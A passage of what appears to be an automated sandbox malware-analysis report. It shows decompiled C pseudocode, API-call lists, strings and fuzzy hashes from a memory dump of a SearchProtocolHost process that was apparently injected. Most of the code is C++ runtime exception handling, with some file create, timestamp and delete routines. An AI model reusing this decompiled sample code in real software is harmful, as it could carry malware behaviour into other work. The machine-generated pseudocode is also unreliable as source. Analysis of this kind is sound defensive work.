                                                										goto L13;
                                                									}
                                                								}
                                                							}
                                                						} else {
                                                							CloseHandle();
                                                							return E02FB0A5D(_v8 ^ _t103, CloseHandle);
                                                						}
                                                					}
                                                				}
                                                 			}

                                                APIs
                                                • wsprintfW.USER32 ref: 02FAA3F6
                                                • wsprintfW.USER32 ref: 02FAA421
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02FAA442
                                                • CloseHandle.KERNEL32(00000000), ref: 02FAA454
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000002,00000080,00000000), ref: 02FAA4E7
                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 02FAA50A
                                                • CloseHandle.KERNEL32(00000000), ref: 02FAA515
                                                • CloseHandle.KERNEL32(00000000), ref: 02FAA52A
                                                • DeleteFileW.KERNEL32(?), ref: 02FAA533
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02FAA552
                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 02FAA571
                                                • CloseHandle.KERNEL32(00000000), ref: 02FAA578
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FAA59B
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FAA5C5
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FAA5E1
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FAA5EC
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FAA5F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$Unothrow_t@std@@@__ehfuncinfo$??2@$CloseHandle$Create$Timewsprintf$Delete
                                                • String ID: %ws.log$%ws\%ws$Microsoft.ini
                                                • API String ID: 3158408392-397874326
                                                • Opcode ID: b7caf07ea9abdc2a3bcb0d9b1441266fe8b41037fc70db17b858d00e1084d5ec
                                                • Instruction ID: 222fea685ada51034bc9ab1881f3cb41e524a2cf71cbeb293882062f3db88334
                                                • Opcode Fuzzy Hash: b7caf07ea9abdc2a3bcb0d9b1441266fe8b41037fc70db17b858d00e1084d5ec
                                                • Instruction Fuzzy Hash: 365174F1A4021CAAEB20DA64CD95FDEB77CAB44754F500599F708B71C0DAB06A89CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E02FB221C(signed int* __ecx, signed int __edx, intOrPtr* _a4, intOrPtr _a8, signed int* _a12, intOrPtr _a16, signed int* _a20, char _a24, intOrPtr _a28, signed int _a32) {
                                                				intOrPtr _v0;
                                                				intOrPtr _v4;
                                                				char _v5;
                                                				char _v12;
                                                				char _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				char _v44;
                                                				char _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				intOrPtr _v60;
                                                				char _v72;
                                                				intOrPtr* _v80;
                                                				signed int _v100;
                                                				signed int* _v144;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				char _t190;
                                                				signed int* _t198;
                                                				intOrPtr* _t199;
                                                				signed int _t202;
                                                				signed int _t206;
                                                				intOrPtr* _t210;
                                                				signed int _t211;
                                                				signed int _t212;
                                                				signed int _t214;
                                                				signed int _t215;
                                                				signed int _t217;
                                                				signed int _t221;
                                                				void* _t225;
                                                				signed int _t227;
                                                				void* _t231;
                                                				void* _t233;
                                                				char _t234;
                                                				signed int* _t236;
                                                				signed int _t237;
                                                				signed int _t238;
                                                				signed int _t240;
                                                				signed int _t244;
                                                				void* _t246;
                                                				void* _t248;
                                                				void* _t251;
                                                				intOrPtr _t253;
                                                				intOrPtr _t254;
                                                				void* _t256;
                                                				char _t257;
                                                				signed int _t263;
                                                				char* _t267;
                                                				intOrPtr _t273;
                                                				signed int _t278;
                                                				signed int _t279;
                                                				signed int _t282;
                                                				char _t283;
                                                				intOrPtr _t285;
                                                				signed int _t287;
                                                				signed int* _t289;
                                                				intOrPtr* _t290;
                                                				signed int* _t292;
                                                				signed int _t294;
                                                				intOrPtr _t300;
                                                				intOrPtr* _t304;
                                                				signed int _t305;
                                                				void* _t306;
                                                				signed int* _t310;
                                                				void* _t313;
                                                				void* _t314;
                                                				void* _t316;
                                                				void* _t317;
                                                				void* _t318;
                                                				void* _t319;
                                                
                                                				_t282 = __edx;
                                                				_t264 = __ecx;
                                                				_t253 = _a8;
                                                				_push(_t304);
                                                				_t289 = _a20;
                                                				_v44 = 0;
                                                				_v5 = 0;
                                                				if(_t289[1] > 0x80) {
                                                					_t190 =  *((intOrPtr*)(_t253 + 8));
                                                				} else {
                                                					_t190 =  *((char*)(_t253 + 8));
                                                				}
                                                				_v12 = _t190;
                                                				if(_t190 < 0xffffffff || _t190 >= _t289[1]) {
                                                					L62:
                                                					E02FB753C(_t253, _t264, _t289, _t304, __eflags);
                                                					goto L63;
                                                				} else {
                                                					_t304 = _a4;
                                                					if( *_t304 != 0xe06d7363) {
                                                						_t264 = _a12;
                                                						goto L57;
                                                					} else {
                                                						if( *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
                                                							L23:
                                                							_t264 = _a12;
                                                							_v16 = _t264;
                                                							goto L25;
                                                						} else {
                                                							_t328 =  *((intOrPtr*)(_t304 + 0x1c));
                                                							if( *((intOrPtr*)(_t304 + 0x1c)) != 0) {
                                                								goto L23;
                                                							} else {
                                                								_t225 = E02FB360E(_t253, _t264, _t282, _t289, _t304, _t328);
                                                								_t329 =  *((intOrPtr*)(_t225 + 0x10));
                                                								if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
                                                									L61:
                                                									return _t225;
                                                								} else {
                                                									_t304 =  *((intOrPtr*)(E02FB360E(_t253, _t264, _t282, _t289, _t304, _t329) + 0x10));
                                                									_t246 = E02FB360E(_t253, _t264, _t282, _t289, _t304, _t329);
                                                									_v44 = 1;
                                                									_v16 =  *((intOrPtr*)(_t246 + 0x14));
                                                									if(_t304 == 0) {
                                                										goto L62;
                                                									} else {
                                                										if( *_t304 != 0xe06d7363 ||  *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
                                                											L19:
                                                											_t248 = E02FB360E(_t253, _t264, _t282, _t289, _t304, _t336);
                                                											_t337 =  *((intOrPtr*)(_t248 + 0x1c));
                                                											if( *((intOrPtr*)(_t248 + 0x1c)) == 0) {
                                                												L24:
                                                												_t264 = _v16;
                                                												_t190 = _v12;
                                                												L25:
                                                												__eflags =  *_t304 - 0xe06d7363;
                                                												if( *_t304 != 0xe06d7363) {
                                                													L57:
                                                													__eflags = _t289[3];
                                                													if(__eflags <= 0) {
                                                														goto L60;
                                                													} else {
                                                														__eflags = _a24;
                                                														if(__eflags != 0) {
                                                															goto L62;
                                                														} else {
                                                															_push(_a32);
                                                															_push(_a28);
                                                															_push(_t190);
                                                															_push(_t289);
                                                															_push(_a16);
                                                															_push(_t264);
                                                															_push(_t253);
                                                															_push(_t304);
                                                															L66();
                                                															_t316 = _t316 + 0x20;
                                                															goto L60;
                                                														}
                                                													}
                                                												} else {
                                                													__eflags =  *((intOrPtr*)(_t304 + 0x10)) - 3;
                                                													if( *((intOrPtr*)(_t304 + 0x10)) != 3) {
                                                														goto L57;
                                                													} else {
                                                														__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930520;
                                                														if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930520) {
                                                															L30:
                                                															__eflags = _t289[3];
                                                															if(_t289[3] > 0) {
                                                																_t264 =  &_v28;
                                                																_t233 = E02FB3879( &_v28, _t289, _a28, _t190,  &_v28,  &_v48);
                                                																_t282 = _v28;
                                                																_t316 = _t316 + 0x14;
                                                																__eflags = _t282 - _v48;
                                                																if(_t282 < _v48) {
                                                																	_t47 = _t233 + 0x10; // 0x10
                                                																	_t278 = _t47;
                                                																	_t234 = _v12;
                                                																	_v36 = _t278;
                                                																	do {
                                                																		_t50 = _t278 - 0x10; // 0x0
                                                																		_v60 = _t50;
                                                																		_t289 = _a20;
                                                																		__eflags =  *((intOrPtr*)(_t278 - 0x10)) - _t234;
                                                																		if( *((intOrPtr*)(_t278 - 0x10)) <= _t234) {
                                                																			__eflags = _t234 -  *((intOrPtr*)(_t278 - 0xc));
                                                																			if(_t234 <=  *((intOrPtr*)(_t278 - 0xc))) {
                                                																				_v24 =  *_t278;
                                                																				_t263 =  *(_t278 - 4);
                                                																				__eflags = _t263;
                                                																				_v32 = _t263;
                                                																				_t253 = _a8;
                                                																				if(_t263 > 0) {
                                                																					_t279 = _v24;
                                                																					_t236 =  *( *((intOrPtr*)(_t304 + 0x1c)) + 0xc);
                                                																					_t287 =  *_t236;
                                                																					_t237 =  &(_t236[1]);
                                                																					__eflags = _t237;
                                                																					_v52 = _t237;
                                                																					_t238 = _v32;
                                                																					_v56 = _t287;
                                                																					while(1) {
                                                																						_v20 = _v52;
                                                																						_t289 = _a20;
                                                																						_v40 = _t287;
                                                																						__eflags = _t287;
                                                																						if(_t287 <= 0) {
                                                																							goto L41;
                                                																						} else {
                                                																							goto L38;
                                                																						}
                                                																						while(1) {
                                                																							L38:
                                                																							_t240 = E02FB2B69(_t279,  *_v20,  *((intOrPtr*)(_t304 + 0x1c)));
                                                																							_t316 = _t316 + 0xc;
                                                																							__eflags = _t240;
                                                																							if(_t240 != 0) {
                                                																								break;
                                                																							}
                                                																							_v20 = _v20 + 4;
                                                																							_t244 = _v40 - 1;
                                                																							_t279 = _v24;
                                                																							_v40 = _t244;
                                                																							__eflags = _t244;
                                                																							if(_t244 > 0) {
                                                																								continue;
                                                																							} else {
                                                																								_t238 = _v32;
                                                																								goto L41;
                                                																							}
                                                																							L44:
                                                																							_t282 = _v28;
                                                																							_t278 = _v36;
                                                																							_t234 = _v12;
                                                																							goto L45;
                                                																						}
                                                																						_push(_v44);
                                                																						_v5 = 1;
                                                																						E02FB2157(_t253, _t287, _t304, _t253, _v16, _a16, _t289, _v24,  *_v20, _v60, _a28, _a32);
                                                																						_t316 = _t316 + 0x2c;
                                                																						goto L44;
                                                																						L41:
                                                																						_t238 = _t238 - 1;
                                                																						_t279 = _t279 + 0x10;
                                                																						_v32 = _t238;
                                                																						_v24 = _t279;
                                                																						__eflags = _t238;
                                                																						if(_t238 > 0) {
                                                																							_t287 = _v56;
                                                																							_v20 = _v52;
                                                																							_t289 = _a20;
                                                																							_v40 = _t287;
                                                																							__eflags = _t287;
                                                																							if(_t287 <= 0) {
                                                																								goto L41;
                                                																							} else {
                                                																								goto L38;
                                                																							}
                                                																						}
                                                																						goto L44;
                                                																					}
                                                																				}
                                                																			}
                                                																		}
                                                																		L45:
                                                																		_t282 = _t282 + 1;
                                                																		_t278 = _t278 + 0x14;
                                                																		_v28 = _t282;
                                                																		_v36 = _t278;
                                                																		__eflags = _t282 - _v48;
                                                																	} while (_t282 < _v48);
                                                																}
                                                															}
                                                															__eflags = _a24;
                                                															if(__eflags != 0) {
                                                																_push(1);
                                                																E02FB1E94(__eflags);
                                                																_t264 = _t304;
                                                															}
                                                															__eflags = _v5;
                                                															if(__eflags != 0) {
                                                																L60:
                                                																_t225 = E02FB360E(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																__eflags =  *(_t225 + 0x1c);
                                                																if(__eflags != 0) {
                                                																	goto L62;
                                                																} else {
                                                																	goto L61;
                                                																}
                                                															} else {
                                                																_t227 =  *_t289 & 0x1fffffff;
                                                																__eflags = _t227 - 0x19930521;
                                                																if(__eflags < 0) {
                                                																	goto L60;
                                                																} else {
                                                																	__eflags = _t289[7];
                                                																	if(_t289[7] != 0) {
                                                																		L52:
                                                																		__eflags = _t289[8] & 0x00000004;
                                                																		if(__eflags != 0) {
                                                																			goto L62;
                                                																		} else {
                                                																			_push(_t289[7]);
                                                																			L86();
                                                																			_t264 = _t304;
                                                																			__eflags = _t227;
                                                																			if(__eflags != 0) {
                                                																				goto L60;
                                                																			} else {
                                                																				E02FB360E(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																				E02FB360E(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																				 *((intOrPtr*)(E02FB360E(_t253, _t264, _t282, _t289, _t304, __eflags) + 0x10)) = _t304;
                                                																				_t231 = E02FB360E(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																				__eflags = _a32;
                                                																				_t267 = _v16;
                                                																				_push(_t304);
                                                																				 *((intOrPtr*)(_t231 + 0x14)) = _t267;
                                                																				if(_a32 != 0) {
                                                																					goto L64;
                                                																				} else {
                                                																					_push(_t253);
                                                																				}
                                                																				goto L65;
                                                																			}
                                                																		}
                                                																	} else {
                                                																		__eflags = _t289[8] & 0x00000004;
                                                																		if(__eflags == 0) {
                                                																			goto L60;
                                                																		} else {
                                                																			goto L52;
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                														} else {
                                                															__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930521;
                                                															if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930521) {
                                                																goto L30;
                                                															} else {
                                                																__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930522;
                                                																if( *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
                                                																	goto L57;
                                                																} else {
                                                																	goto L30;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											} else {
                                                												_v36 =  *((intOrPtr*)(E02FB360E(_t253, _t264, _t282, _t289, _t304, _t337) + 0x1c));
                                                												_t251 = E02FB360E(_t253, _t264, _t282, _t289, _t304, _t337);
                                                												_push(_v36);
                                                												_push(_t304);
                                                												 *(_t251 + 0x1c) =  *(_t251 + 0x1c) & 0x00000000;
                                                												L86();
                                                												if(_t251 != 0) {
                                                													goto L24;
                                                												} else {
                                                													_push(_v36);
                                                													L99();
                                                													_pop(_t264);
                                                													_t339 = _t251;
                                                													if(_t251 == 0) {
                                                														goto L62;
                                                													} else {
                                                													}
                                                													L63:
                                                													_push(1);
                                                													_push(_t304);
                                                													E02FB1E94(_t339);
                                                													_t267 =  &_v72;
                                                													E02FB1F49(_t267);
                                                													E02FB33CD( &_v72, 0x2fcde1c);
                                                													L64:
                                                													_push(_a32);
                                                													L65:
                                                													E02FB3923(_t267);
                                                													_push(_a16);
                                                													_push(_t253);
                                                													E02FB29A5(_t253, _t267, _t282, _t289, _t339);
                                                													_t317 = _t316 + 0x10;
                                                													_push(_t289[7]);
                                                													_t198 = E02FB211D(_t253, _t267, _t282, _t289, _t304, _t339);
                                                													asm("int3");
                                                													_t313 = _t317;
                                                													_push(_t267);
                                                													_push(_t267);
                                                													_push(_t289);
                                                													_t290 = _v80;
                                                													_t340 =  *_t290 - 0x80000003;
                                                													if( *_t290 == 0x80000003) {
                                                														L84:
                                                														return _t198;
                                                													} else {
                                                														_push(_t253);
                                                														_t199 = E02FB360E(_t253, _t267, _t282, _t290, _t304, _t340, _t304);
                                                														_t254 = _a16;
                                                														_t341 =  *((intOrPtr*)(_t199 + 8));
                                                														if( *((intOrPtr*)(_t199 + 8)) == 0) {
                                                															L72:
                                                															if( *((intOrPtr*)(_t254 + 0xc)) == 0) {
                                                																E02FB753C(_t254, _t267, _t290, _t304, __eflags);
                                                																asm("int3");
                                                																_push(_t313);
                                                																_t314 = _t317;
                                                																_t318 = _t317 - 0x18;
                                                																_push(_t254);
                                                																_push(_t304);
                                                																_t305 = _v100;
                                                																_push(_t290);
                                                																__eflags = _t305;
                                                																if(__eflags == 0) {
                                                																	E02FB753C(_t254, _t267, _t290, _t305, __eflags);
                                                																	asm("int3");
                                                																	_push(_t314);
                                                																	_push(_t254);
                                                																	_push(_t305);
                                                																	_push(_t290);
                                                																	_t292 = _v144;
                                                																	_t306 = 0;
                                                																	__eflags =  *_t292;
                                                																	if( *_t292 <= 0) {
                                                																		L103:
                                                																		_t202 = 0;
                                                																		__eflags = 0;
                                                																	} else {
                                                																		_t256 = 0;
                                                																		while(1) {
                                                																			_t206 = E02FB359A( *((intOrPtr*)(_t256 + _t292[1] + 4)) + 4, 0x2fd5d4c);
                                                																			__eflags = _t206;
                                                																			if(_t206 == 0) {
                                                																				break;
                                                																			}
                                                																			_t306 = _t306 + 1;
                                                																			_t256 = _t256 + 0x10;
                                                																			__eflags = _t306 -  *_t292;
                                                																			if(_t306 <  *_t292) {
                                                																				continue;
                                                																			} else {
                                                																				goto L103;
                                                																			}
                                                																			goto L104;
                                                																		}
                                                																		_t202 = 1;
                                                																	}
                                                																	L104:
                                                																	return _t202;
                                                																} else {
                                                																	_t294 =  *_t305;
                                                																	_t257 = 0;
                                                																	__eflags = _t294;
                                                																	if(_t294 > 0) {
                                                																		_t283 = 0;
                                                																		_v16 = 0;
                                                																		_t210 =  *((intOrPtr*)( *((intOrPtr*)(_v4 + 0x1c)) + 0xc));
                                                																		_t211 = _t210 + 4;
                                                																		__eflags = _t211;
                                                																		_v28 =  *_t210;
                                                																		_v36 = _t211;
                                                																		do {
                                                																			_t271 = _t211;
                                                																			_t212 = _v28;
                                                																			_v24 = _t211;
                                                																			_v20 = _t212;
                                                																			__eflags = _t212;
                                                																			if(_t212 > 0) {
                                                																				_t214 =  *((intOrPtr*)(_t305 + 4)) + _t283;
                                                																				__eflags = _t214;
                                                																				_v32 = _t214;
                                                																				while(1) {
                                                																					_t215 = E02FB2B69(_t214,  *_t271,  *((intOrPtr*)(_v4 + 0x1c)));
                                                																					_t318 = _t318 + 0xc;
                                                																					__eflags = _t215;
                                                																					if(_t215 != 0) {
                                                																						break;
                                                																					}
                                                																					_t217 = _v20 - 1;
                                                																					_t271 = _v24 + 4;
                                                																					_v20 = _t217;
                                                																					__eflags = _t217;
                                                																					_v24 = _v24 + 4;
                                                																					_t214 = _v32;
                                                																					if(_t217 > 0) {
                                                																						continue;
                                                																					} else {
                                                																					}
                                                																					L95:
                                                																					_t283 = _v16;
                                                																					goto L96;
                                                																				}
                                                																				_t257 = 1;
                                                																				goto L95;
                                                																			}
                                                																			L96:
                                                																			_t211 = _v36;
                                                																			_t283 = _t283 + 0x10;
                                                																			_v16 = _t283;
                                                																			_t294 = _t294 - 1;
                                                																			__eflags = _t294;
                                                																		} while (_t294 != 0);
                                                																	}
                                                																	return _t257;
                                                																}
                                                															} else {
                                                																_t198 = E02FB3879(_t267, _t254, _a24, _a20,  &_v16,  &_v12);
                                                																_t273 = _v16;
                                                																_t319 = _t317 + 0x14;
                                                																_t285 = _v12;
                                                																if(_t273 < _t285) {
                                                																	_t137 =  &(_t198[3]); // 0xc
                                                																	_t310 = _t137;
                                                																	_t198 = _a20;
                                                																	do {
                                                																		if(_t198 >=  *((intOrPtr*)(_t310 - 0xc)) && _t198 <=  *((intOrPtr*)(_t310 - 8))) {
                                                																			_t221 =  *_t310 << 4;
                                                																			if( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) == 0) {
                                                																				L79:
                                                																				_t222 = _t221 + _t310[1] + 0xfffffff0;
                                                																				_t300 = _v0;
                                                																				if(( *(_t221 + _t310[1] + 0xfffffff0) & 0x00000040) == 0) {
                                                																					_push(1);
                                                																					_t155 = _t310 - 0xc; // 0x0
                                                																					E02FB2157(_t254, _t285, _t300, _a4, _a8, _a12, _t254, _t222, 0, _t155, _a24, _a28);
                                                																					_t285 = _v12;
                                                																					_t319 = _t319 + 0x2c;
                                                																					_t273 = _v16;
                                                																				}
                                                																			} else {
                                                																				_t285 = _v12;
                                                																				_t254 = _a16;
                                                																				if( *((char*)( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) + 8)) == 0) {
                                                																					goto L79;
                                                																				}
                                                																			}
                                                																			_t198 = _a20;
                                                																		}
                                                																		_t273 = _t273 + 1;
                                                																		_t310 =  &(_t310[5]);
                                                																		_v16 = _t273;
                                                																	} while (_t273 < _t285);
                                                																}
                                                																goto L83;
                                                															}
                                                														} else {
                                                															__imp__EncodePointer();
                                                															_t304 = _t199;
                                                															if( *((intOrPtr*)(E02FB360E(_t254, _t267, _t282, _t290, _t304, _t341, 0) + 8)) == _t304 ||  *_t290 == 0xe0434f4d ||  *_t290 == 0xe0434352) {
                                                																goto L72;
                                                															} else {
                                                																_t198 = E02FB379C(_t290, _a4, _a8, _a12, _t254, _a24, _a28);
                                                																_t317 = _t317 + 0x1c;
                                                																if(_t198 != 0) {
                                                																	L83:
                                                																	goto L84;
                                                																} else {
                                                																	goto L72;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										} else {
                                                											_t336 =  *((intOrPtr*)(_t304 + 0x1c));
                                                											if( *((intOrPtr*)(_t304 + 0x1c)) == 0) {
                                                												goto L62;
                                                											} else {
                                                												goto L19;
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}

                                                0x02fb24ba
                                                0x02fb24b4
                                                0x02fb236e
                                                0x02fb236e
                                                0x02fb2375
                                                0x00000000
                                                0x02fb2377
                                                0x02fb2377
                                                0x02fb237e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb237e
                                                0x02fb2375
                                                0x02fb236c
                                                0x02fb235f
                                                0x02fb2308
                                                0x02fb2310
                                                0x02fb2313
                                                0x02fb2318
                                                0x02fb231b
                                                0x02fb231c
                                                0x02fb2320
                                                0x02fb2329
                                                0x00000000
                                                0x02fb232b
                                                0x02fb232b
                                                0x02fb232e
                                                0x02fb2333
                                                0x02fb2334
                                                0x02fb2336
                                                0x00000000
                                                0x00000000
                                                0x02fb233c
                                                0x02fb253a
                                                0x02fb253a
                                                0x02fb253c
                                                0x02fb253d
                                                0x02fb2544
                                                0x02fb2547
                                                0x02fb2555
                                                0x02fb255a
                                                0x02fb255a
                                                0x02fb255d
                                                0x02fb255d
                                                0x02fb2565
                                                0x02fb2568
                                                0x02fb2569
                                                0x02fb256e
                                                0x02fb2571
                                                0x02fb2574
                                                0x02fb2579
                                                0x02fb257b
                                                0x02fb257d
                                                0x02fb257e
                                                0x02fb257f
                                                0x02fb2580
                                                0x02fb2583
                                                0x02fb2589
                                                0x02fb268a
                                                0x02fb268e
                                                0x02fb258f
                                                0x02fb258f
                                                0x02fb2591
                                                0x02fb2596
                                                0x02fb2599
                                                0x02fb259d
                                                0x02fb25e4
                                                0x02fb25e8
                                                0x02fb268f
                                                0x02fb2694
                                                0x02fb2695
                                                0x02fb2696
                                                0x02fb2698
                                                0x02fb269b
                                                0x02fb269c
                                                0x02fb269d
                                                0x02fb26a0
                                                0x02fb26a1
                                                0x02fb26a3
                                                0x02fb272b
                                                0x02fb2730
                                                0x02fb2731
                                                0x02fb2734
                                                0x02fb2735
                                                0x02fb2736
                                                0x02fb2737
                                                0x02fb273a
                                                0x02fb273c
                                                0x02fb273e
                                                0x02fb2765
                                                0x02fb2765
                                                0x02fb2765
                                                0x02fb2740
                                                0x02fb2740
                                                0x02fb2742
                                                0x02fb2752
                                                0x02fb2759
                                                0x02fb275b
                                                0x00000000
                                                0x00000000
                                                0x02fb275d
                                                0x02fb275e
                                                0x02fb2761
                                                0x02fb2763
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb2763
                                                0x02fb276c
                                                0x02fb276c
                                                0x02fb2767
                                                0x02fb276b
                                                0x02fb26a9
                                                0x02fb26a9
                                                0x02fb26ab
                                                0x02fb26ad
                                                0x02fb26af
                                                0x02fb26b4
                                                0x02fb26b6
                                                0x02fb26bc
                                                0x02fb26c1
                                                0x02fb26c1
                                                0x02fb26c4
                                                0x02fb26c7
                                                0x02fb26ca
                                                0x02fb26ca
                                                0x02fb26cc
                                                0x02fb26cf
                                                0x02fb26d2
                                                0x02fb26d5
                                                0x02fb26d7
                                                0x02fb26dc
                                                0x02fb26dc
                                                0x02fb26de
                                                0x02fb26e1
                                                0x02fb26ea
                                                0x02fb26ef
                                                0x02fb26f2
                                                0x02fb26f4
                                                0x00000000
                                                0x00000000
                                                0x02fb26fc
                                                0x02fb26fd
                                                0x02fb2700
                                                0x02fb2703
                                                0x02fb2705
                                                0x02fb2708
                                                0x02fb270b
                                                0x00000000
                                                0x00000000
                                                0x02fb270d
                                                0x02fb2711
                                                0x02fb2711
                                                0x00000000
                                                0x02fb2711
                                                0x02fb270f
                                                0x00000000
                                                0x02fb270f
                                                0x02fb2714
                                                0x02fb2714
                                                0x02fb2717
                                                0x02fb271a
                                                0x02fb271d
                                                0x02fb271d
                                                0x02fb271d
                                                0x02fb26ca
                                                0x02fb272a
                                                0x02fb272a
                                                0x02fb25ee
                                                0x02fb25fd
                                                0x02fb2602
                                                0x02fb2605
                                                0x02fb2608
                                                0x02fb260d
                                                0x02fb260f
                                                0x02fb260f
                                                0x02fb2612
                                                0x02fb2615
                                                0x02fb2618
                                                0x02fb2624
                                                0x02fb262d
                                                0x02fb2642
                                                0x02fb2648
                                                0x02fb264a
                                                0x02fb2650
                                                0x02fb2652
                                                0x02fb2657
                                                0x02fb266c
                                                0x02fb2671
                                                0x02fb2674
                                                0x02fb2677
                                                0x02fb2677
                                                0x02fb262f
                                                0x02fb2636
                                                0x02fb263d
                                                0x02fb2640
                                                0x00000000
                                                0x00000000
                                                0x02fb2640
                                                0x02fb267a
                                                0x02fb267a
                                                0x02fb267d
                                                0x02fb267e
                                                0x02fb2681
                                                0x02fb2684
                                                0x02fb2615
                                                0x00000000
                                                0x02fb260d
                                                0x02fb259f
                                                0x02fb25a1
                                                0x02fb25a7
                                                0x02fb25b1
                                                0x00000000
                                                0x02fb25c3
                                                0x02fb25d4
                                                0x02fb25d9
                                                0x02fb25de
                                                0x02fb2688
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb25de
                                                0x02fb25b1
                                                0x02fb259d
                                                0x02fb2589
                                                0x02fb2329
                                                0x02fb22f3
                                                0x02fb22f3
                                                0x02fb22f7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb22f7
                                                0x02fb22d0
                                                0x02fb22c4
                                                0x02fb22a5
                                                0x02fb2296
                                                0x02fb226d
                                                0x02fb2263

                                                APIs
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 02FB2320
                                                • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 02FB239B
                                                • ___TypeMatch.LIBVCRUNTIME ref: 02FB2419
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 02FB249B
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 02FB24CC
                                                • FindHandlerForForeignException.LIBVCRUNTIME ref: 02FB251B
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 02FB253D
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02FB2555
                                                • _UnwindNestedFrames.LIBCMT ref: 02FB255D
                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 02FB2569
                                                • CallUnexpected.LIBVCRUNTIME ref: 02FB2574
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Exception$DestructObjectSpecUnwind$CallCheckException@8FindForeignFrameFramesHandlerMatchNestedRangeStateThrowTrysTypeUnexpected
                                                • String ID: csm$csm$csm
                                                • API String ID: 410073093-393685449
                                                • Opcode ID: e6daf98fd5e0c1eecae80cfe8969c7d8b7a120ae926c4258f0e6e5711629dfb8
                                                • Instruction ID: f18f4350bf1c534138951ea7fb6e8afe739e0f21164cef348c5b3f5f4d2997f0
                                                • Opcode Fuzzy Hash: e6daf98fd5e0c1eecae80cfe8969c7d8b7a120ae926c4258f0e6e5711629dfb8
                                                • Instruction Fuzzy Hash: 78B19E71C00609DFDF26DFA6C890BEEBBB6BF08394F044159EA1166651C731EA41CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E02FA9740(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v528;
                                                				char _v788;
                                                				intOrPtr _v792;
                                                				intOrPtr _v796;
                                                				void* __esi;
                                                				signed int _t22;
                                                				void* _t51;
                                                				struct HRSRC__* _t57;
                                                				void* _t70;
                                                				long _t71;
                                                				void** _t72;
                                                				signed int _t73;
                                                
                                                				_t68 = __edi;
                                                				_t58 = __ecx;
                                                				_t22 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t22 ^ _t73;
                                                				_v792 = __edx;
                                                				_v796 = __ecx;
                                                				E02FB3440(__edi,  &_v788, 0, 0x104);
                                                				E02FB3440(_t68,  &_v528, 0, 0x104);
                                                				E02FB3440(_t68,  &_v268, 0, 0x104);
                                                				GetSystemDirectoryA( &_v788, 0x104);
